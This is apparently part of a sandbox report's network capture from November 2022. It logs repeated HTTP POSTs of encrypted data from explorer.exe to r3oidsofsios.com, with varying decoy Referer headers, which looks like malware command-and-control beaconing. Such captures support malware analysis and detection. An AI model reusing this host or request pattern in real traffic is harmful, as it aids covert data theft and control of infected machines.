61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          13192.168.2.749728185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:36.105882883 CET311OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://vshacsl.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 190
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:36.105950117 CET311OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9b 02 1f d3 26 f2 fe 75 b6 10 40 4c
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u@LN[4Q,TwDR4d,&Z&5]P$M{H_1 ?*ud~7n`N+Zk^mkG`c$
                          Nov 30, 2022 00:12:36.227736950 CET312INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:36 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          14192.168.2.749729185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:36.395279884 CET312OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://kabjenh.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 227
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:36.395329952 CET313OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 9a 02 1f d3 26 f2 fe 75 d2 68 58 45
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uhXE*n1J3aj?8w5jOVeI'<)R15wvgjSxjm\d(fk)HDVaG6 B:*CvF{1N,
                          Nov 30, 2022 00:12:36.515480042 CET313INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:36 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          15192.168.2.749730185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:36.576366901 CET314OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://vyukg.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 329
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:36.576366901 CET314OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 99 02 1f d3 26 f2 fe 75 ca 78 18 2f
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ux/Y04v68v,9cx*fVvo/VX"OS$)a{MK;/@w-`pu^)I'*80j)9JBcljtEPuV=4;U
                          Nov 30, 2022 00:12:36.694408894 CET314INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:36 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          16192.168.2.749731185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:37.030910969 CET315OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://xnfwjbsuvp.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 288
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:37.030910969 CET316OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 98 02 1f d3 26 f2 fe 75 b6 0d 01 47
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uG~9=Cm^\^:wJRS;9qEEWRM$"NsBJ'6p4'CTJf X[0Pgi?6W;.XI=Y'i3Py^b}4)'W#cq8k[XK
                          Nov 30, 2022 00:12:37.153716087 CET316INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:37 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          17192.168.2.749732185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:37.214968920 CET317OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://nvftibg.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 185
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:37.214968920 CET317OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 87 02 1f d3 26 f2 fe 75 cb 70 0b 22
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&up"m#h0?Tm:yFE^SHm{%>Ow!6rXo,[UV3;7+\^#2yo=u8
                          Nov 30, 2022 00:12:37.334481001 CET318INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:37 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          18192.168.2.749733185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:37.404042959 CET318OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://okade.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 252
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:37.404042959 CET319OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 86 02 1f d3 26 f2 fe 75 d9 07 56 51
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uVQ6c-J^RXq4@H_D ^;O8.1]zh~4@V<-`U.NV?f2R:FUF>D5xDj)+$U!A-E_E9u2iLh
                          Nov 30, 2022 00:12:37.519344091 CET319INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:37 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          19192.168.2.749734185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:37.578322887 CET320OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://iungf.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 300
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:37.578350067 CET320OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 85 02 1f d3 26 f2 fe 75 e2 6c 47 4e
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&ulGN=97o,bXz"(>x@6L51cJ0OGK!l9rw9}1jo'za8>"U_I$R4<$~_;C{G7%P:$TshRhH
                          Nov 30, 2022 00:12:37.706790924 CET321INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:37 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          2192.168.2.749717185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:33.058831930 CET295OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://ewfonmrybp.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 137
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:33.058873892 CET295OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 96 02 1f d3 26 f2 fe 75 db 61 4a 58
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uaJX.HPV9R@5>kL,8-\&H*09T~n
                          Nov 30, 2022 00:12:33.180012941 CET295INHTTP/1.1 200 OK
                          Date: Tue, 29 Nov 2022 23:12:33 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 0
                          Connection: close
                          Content-Type: text/html; charset=utf-8


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          20192.168.2.749735185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:37.811109066 CET322OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://bhqtkqlvvb.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 218
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:37.811254025 CET322OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 84 02 1f d3 26 f2 fe 75 ef 40 25 56
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u@%VS'(L{J>7/i\b/:1$ckU(qA<v&qDqe0!KY;!zR)Jri"HJZ*Mhy-h~dko\
                          Nov 30, 2022 00:12:37.938654900 CET323INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:37 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          21192.168.2.749736185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:38.007920027 CET323OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://whvkq.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 254
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:38.007920027 CET324OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 83 02 1f d3 26 f2 fe 75 ea 52 3f 23
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uR?#IS>|yY[u\.JZQk4Tw/4lCDp+<d!44=!O][UZMDKH+Z*G's/zT)bxp!@C;,p<kr
                          Nov 30, 2022 00:12:38.127856016 CET324INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:38 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          22192.168.2.749737185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:38.187767029 CET325OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://rspyhp.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 161
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:38.187999964 CET325OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 82 02 1f d3 26 f2 fe 75 ce 16 18 26
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&u&v 7~dPpGd&_zNDe1-?JB]VaZn*?eKO3(
                          Nov 30, 2022 00:12:38.306819916 CET326INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:38 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 72 33 6f 69 64 73 6f 66 73 69 6f 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at r3oidsofsios.com Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          23192.168.2.749738185.246.221.15180C:\Windows\explorer.exe
                          TimestampkBytes transferredDirectionData
                          Nov 30, 2022 00:12:38.389544964 CET327OUTPOST / HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://jvjyarecuw.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 298
                          Host: r3oidsofsios.com
                          Nov 30, 2022 00:12:38.389569998 CET327OUTData Raw: a4 60 f3 79 88 44 d6 5c 28 b8 4a 80 9b 13 d8 49 cd ac d5 12 f1 ff ec d5 60 c6 0b 8b 04 da 64 4b c9 4f 41 f0 79 b4 e3 2f dd 23 7b e9 3a fe f6 9e 82 73 db c2 b0 91 d5 bb 20 52 b6 37 0d e1 65 1d d4 39 e2 12 d0 66 81 02 1f d3 26 f2 fe 75 d3 71 2b 3e
                          Data Ascii: `yD\(JI`dKOAy/#{:s R7e9f&uq+>^Y>P+tWsTy)~7UE~ExcQK;QX}f*6?B%:K%Vm`<p20Y@CK0:y"F5`n&.[&^U}%#(fF
                          Nov 30, 2022 00:12:38.503267050 CET328INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Nov 2022 23:12:38 GMT
                          Server: Apache/2.4.41 (Ubuntu)
                          Content-Length: 404
                          Connection: close
                          Content-Type: text/html; charset=utf-8
